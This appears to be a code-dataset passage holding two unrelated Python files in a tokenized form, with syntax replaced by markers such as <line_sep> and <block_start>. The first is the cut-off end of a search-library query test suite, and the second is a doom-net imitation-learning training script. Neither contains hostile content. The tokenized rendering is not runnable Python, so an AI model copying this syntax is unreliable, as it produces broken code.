"alfa") query.Or([query.Not(query.Term("b" "bravo")) query.Not(query.Term("b" "charlie"))])])<line_sep>r=s.search(q)<assert_stmt>len(r)<eq>1<block_end><block_end><def_stmt>test_or_nots2 # Issue #286 <block_start>schema=fields.Schema(a=fields.KEYWORD(stored=<true>) b=fields.KEYWORD(stored=<true>))<line_sep>st=RamStorage()<line_sep>ix=st.create_index(schema)<with_stmt>ix.writer()<as>w<block_start>w.add_document(b=u("bravo"))<block_end><with_stmt>ix.searcher()<as>s<block_start>q=query.Or([query.Term("a" "alfa") query.Not(query.Term("b" "alfa"))])<line_sep>r=s.search(q)<assert_stmt>len(r)<eq>1<block_end><block_end><def_stmt>test_or_nots3 <block_start>schema=fields.Schema(title=fields.TEXT(stored=<true>) itemtype=fields.ID(stored=<true>))<with_stmt>TempIndex(schema "ornot")<as>ix<block_start>w=ix.writer()<line_sep>w.add_document(title=u("a1") itemtype=u("a"))<line_sep>w.add_document(title=u("a2") itemtype=u("a"))<line_sep>w.add_document(title=u("b1") itemtype=u("b"))<line_sep>w.commit()<line_sep>q=Term('itemtype' 'a')|Not(Term('itemtype' 'a'))<with_stmt>ix.searcher()<as>s<block_start>r=" ".join([hit["title"]<for>hit s.search(q)])<assert_stmt>r<eq>"a1 a2 b1"<block_end><block_end><block_end><def_stmt>test_ornot_andnot <block_start>schema=fields.Schema(id=fields.NUMERIC(stored=<true>) a=fields.KEYWORD())<line_sep>st=RamStorage()<line_sep>ix=st.create_index(schema)<with_stmt>ix.writer()<as>w<block_start>w.add_document(id=0 a=u("word1 word1"))<line_sep>w.add_document(id=1 a=u("word1 word2"))<line_sep>w.add_document(id=2 a=u("word1 foo"))<line_sep>w.add_document(id=3 a=u("foo word2"))<line_sep>w.add_document(id=4 a=u("foo bar"))<block_end><with_stmt>ix.searcher()<as>s<block_start>qp=qparser.QueryParser("a" ix.schema)<line_sep>q1=qp.parse(u("NOT word1 NOT word2"))<line_sep>q2=qp.parse(u("NOT (word1 OR word2)"))<line_sep>r1=[hit["id"]<for>hit s.search(q1 sortedby="id")]<line_sep>r2=[hit["id"]<for>hit s.search(q2 sortedby="id")]<assert_stmt>r1<eq>r2<eq>[4]<block_end><block_end><def_stmt>test_none_in_compounds <block_start><with_stmt>pytest.raises(query.QueryError)<block_start>_=query.And([query.Term("a" "b") <none> query.Term("c" "d")])<block_end><block_end><def_stmt>test_issue_355 <block_start>schema=fields.Schema(seats=fields.NUMERIC(bits=8 stored=<true>))<line_sep>ix=RamStorage().create_index(schema)<with_stmt>ix.writer()<as>w<block_start>w.add_document(seats=0)<line_sep>w.add_document(seats=10)<line_sep>w.add_document(seats=20)<block_end><with_stmt>ix.searcher()<as>s# Passing a bytestring for a numeric field <block_start>q=Term("seats" b("maker"))<line_sep>r1=[hit["seats"]<for>hit s.search(q limit=5)]<line_sep># Passing a unicode string for a numeric field q=Term("seats" u("maker"))<line_sep>r2=[hit["seats"]<for>hit s.search(q limit=5)]<line_sep># Passing a value too large for the numeric field q=Term("seats" 260)<line_sep>r3=[hit["seats"]<for>hit s.search(q limit=5)]<assert_stmt>r1<eq>r2<eq>r3<eq>[]<block_end><block_end><def_stmt>test_sequence <block_start>schema=fields.Schema(id=fields.STORED text=fields.TEXT)<line_sep>ix=RamStorage().create_index(schema)<with_stmt>ix.writer()<as>w<block_start>w.add_document(id=0 text=u("alfa bravo charlie delta echo"))<line_sep>w.add_document(id=1 text=u("bravo charlie delta echo alfa"))<line_sep>w.add_document(id=2 text=u("charlie delta echo bravo"))<line_sep>w.add_document(id=3 text=u("delta echo charlie"))<line_sep>w.add_document(id=4 text=u("echo delta"))<block_end><with_stmt>ix.searcher()<as>s<block_start>seq=query.Sequence([query.Term("text" u("echo")) query.Term("text" u("alfa"))])<line_sep>q=query.And([query.Term("text" "bravo") seq])<line_sep>r=s.search(q limit=4)<assert_stmt>len(r)<eq>1<assert_stmt>r[0]["id"]<eq>1<block_end><block_end><def_stmt>test_andmaybe <block_start>schema=fields.Schema(id=fields.STORED text=fields.TEXT)<line_sep>ix=RamStorage().create_index(schema)<with_stmt>ix.writer()<as>w<block_start>w.add_document(id=0 text=u("alfa bravo charlie delta echo"))<line_sep>w.add_document(id=1 text=u("bravo charlie delta echo alfa"))<line_sep>w.add_document(id=2 text=u("charlie delta echo bravo"))<line_sep>w.add_document(id=3 text=u("delta echo charlie"))<line_sep>w.add_document(id=4 text=u("echo delta"))<block_end>qp=qparser.QueryParser("text" schema)<line_sep>q=qp.parse(u('bravo ANDMAYBE "echo alfa"'))<with_stmt>ix.searcher()<as>s<block_start>r=s.search(q)<assert_stmt>len(r)<eq>3<assert_stmt>[hit["id"]<for>hit r]<eq>[1 2 0]<block_end><block_end><def_stmt>test_numeric_filter <block_start>schema=fields.Schema(status=fields.NUMERIC tags=fields.TEXT)<line_sep>ix=RamStorage().create_index(schema)<line_sep># Add a single document with status = -2 <with_stmt>ix.writer()<as>w<block_start>w.add_document(status=-2 tags=u"alfa bravo")<block_end><with_stmt>ix.searcher()<as>s# No document should match the filter <block_start>fq=query.NumericRange("status" 0 2)<line_sep>fr=s.search(fq)<assert_stmt>fr.scored_length()<eq>0<line_sep># Make sure the query would otherwise match q=query.Term("tags" u"alfa")<line_sep>r=s.search(q)<assert_stmt>r.scored_length()<eq>1<line_sep># Check the query doesn't match with the filter r=s.search(q filter=fq)<assert_stmt>r.scored_length()<eq>0<block_end><block_end><def_stmt>test_andnot_reverse # Bitbucket issue 419 <block_start>docs=['ruby' 'sapphire' 'ruby + sapphire']<line_sep>schema=fields.Schema(name=fields.TEXT(stored=<true>))<line_sep>q=query.AndNot(query.Term('name' 'ruby') query.Term('name' 'sapphire'))<with_stmt>TempIndex(schema)<as>ix<block_start><with_stmt>ix.writer()<as>w<block_start><for_stmt>name docs<block_start>w.add_document(name=u(name))<block_end><block_end><with_stmt>ix.searcher()<as>s<block_start>names_fw=[hit["name"]<for>hit s.search(q limit=<none>)]<block_end><block_end><with_stmt>TempIndex(schema)<as>ix<block_start><with_stmt>ix.writer()<as>w<block_start><for_stmt>name reversed(docs)<block_start>w.add_document(name=u(name))<block_end><block_end><with_stmt>ix.searcher()<as>s<block_start>names_rv=[hit["name"]<for>hit s.search(q limit=<none>)]<block_end><block_end><assert_stmt>len(names_fw)<eq>len(names_rv)<eq>1<assert_stmt>names_fw<eq>names_rv<block_end>
# # imitation_frames.py, doom-net # # Created by <NAME> on 01/21/17. # <import_stmt>os<import_stmt>time<import_stmt>h5py<import_stmt>torch<import_stmt>torch.nn<as>nn<import_stmt>torch.optim<as>optim<import_from_stmt>device device<import_stmt>argparse<import_from_stmt>doom_instance *<import_from_stmt>aac BaseModel<def_stmt>data_generator args screens variables labels episodes step_size# remove short episodes <block_start>episode_min_size=args.episode_size<times>step_size<line_sep>episodes=episodes[episodes[: 1]-episodes[: 0]<g>episode_min_size]<line_sep>episodes_num=len(episodes)<line_sep># step_idx=episodes[: 0].copy()+np.random.randint(step_size size=episodes_num)<line_sep>step_screens=np.ndarray(shape=(args.batch_size *screens.shape[1:]) dtype=np.float32)<line_sep>step_variables=np.ndarray(shape=(args.batch_size *variables.shape[1:]) dtype=np.float32)<line_sep>step_labels=np.ndarray(shape=(args.batch_size ) dtype=np.int)<line_sep>step_terminals=np.ones(shape=(args.batch_size ) dtype=np.float32)<line_sep># select episodes for the initial batch batch_episodes=np.random.randint(episodes_num size=args.batch_size)<while_stmt><true><block_start><for_stmt>i range(args.batch_size)<block_start>idx=batch_episodes[i]<line_sep>step_screens[i :]=screens[step_idx[idx]]/127.5-1.0<line_sep>step_variables[i :]=variables[step_idx[idx]]/100<line_sep>step_labels[i]=labels[step_idx[idx]]<line_sep>step_idx[idx]<augadd>step_size<if_stmt>step_idx[idx]<g>episodes[idx][1]<block_start>step_idx[idx]=episodes[idx][0]+np.random.randint(step_size)<line_sep>step_terminals[i]=0<line_sep># reached terminal state, select a new episode batch_episodes[i]=np.random.randint(episodes_num)<block_end><else_stmt><block_start>step_terminals[i]=1<block_end><block_end><yield>torch.from_numpy(step_screens) torch.from_numpy(step_variables) torch.from_numpy(step_labels) torch.from_numpy(step_terminals)<block_end><block_end><def_stmt>train args<block_start>data_file=h5py.File(args.h5_path 'r')<line_sep>screens=data_file['screens']<line_sep>variables=data_file['variables']<line_sep>labels=data_file['action_labels']<line_sep>print('Dataset size =' len(screens))<line_sep>action_sets=data_file['action_sets'][:]<line_sep>episodes=data_file['episodes'][:]<line_sep>input_shape=screens[0].shape<line_sep>train_generator=data_generator(args screens variables labels episodes args.skiprate)<line_sep>np.save('action_set' action_sets)<line_sep>model=BaseModel(input_shape[0]<times>args.frame_num len(action_sets) variables.shape[1] args.frame_num).to(device)<if_stmt>args.load<is><not><none><and>os.path.isfile(args.load)<block_start>print("loading model parameters {}".format(args.load))<line_sep>source_model=torch.load(args.load)<line_sep>model.load_state_dict(source_model.state_dict())<del_stmt>source_model<block_end>criterion=nn.CrossEntropyLoss()<line_sep>optimizer=optim.AdamW(model.parameters() lr=5e-4)<line_sep>optimizer.zero_grad()<line_sep>running_loss=0<line_sep>running_accuracy=0<line_sep>batch_time=time.time()<for_stmt>batch,(screens variables labels terminals) enumerate(train_generator)<block_start>labels=labels.to(device)<line_sep>outputs,_=model(*model.transform_input(screens variables))<line_sep>loss=criterion(outputs labels)<line_sep>model.set_terminal(terminals)<line_sep>running_loss<augadd>loss.item()<line_sep>_,pred=outputs.max(1)<line_sep>accuracy=(pred<eq>labels).float().mean()<line_sep>running_accuracy<augadd>accuracy<line_sep>loss.backward()<line_sep>optimizer.step()<line_sep>optimizer.zero_grad()<if_stmt>batch%args.episode_length<eq>args.episode_length-1<block_start>running_loss<augdiv>args.episode_length<line_sep>running_accuracy<augdiv>args.episode_length<line_sep>print('[{:d}] loss: {:.3f}, accuracy: {:.3f}, time: {:.6f}'.format(batch+1 running_loss running_accuracy time.time()-batch_time))<line_sep>running_loss=0<line_sep>running_accuracy=0<line_sep>batch_time=time.time()<block_end><if_stmt>batch%args.checkpoint_rate<eq>args.checkpoint_rate-1<block_start>torch.save(model args.checkpoint_file)<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>parser=argparse.ArgumentParser(description='Doom Recorder')<line_sep>parser.add_argument('--episode_size' type=int default=20 help='number of steps in an episode')<line_sep>parser.add_argument('--batch_size' type=int default=64 help='number of game instances running in parallel')<line_sep>parser.add_argument('--load' default=<none> help='path to model file')<line_sep>parser.add_argument('--h5_path' default=os.path.expanduser('~')+'/test/datasets/vizdoom/cig_map01/flat.h5' help='hd5 file path')<line_sep>parser.add_argument('--skiprate' type=int default=2 help='number of skipped frames')<line_sep>parser.add_argument('--episode_length' type=int default=30 help='episode length')<line_sep>parser.add_argument('--frame_num' type=int default=4 help='number of frames per input')<line_sep>parser.add_argument('--checkpoint_file' default=<none> help='check point file name')<line_sep>parser.add_argument('--checkpoint_rate' type=int default=5000 help='number of batches per checkpoit')<line_sep>args=parser.parse_args()<line_sep>train(args)<block_end>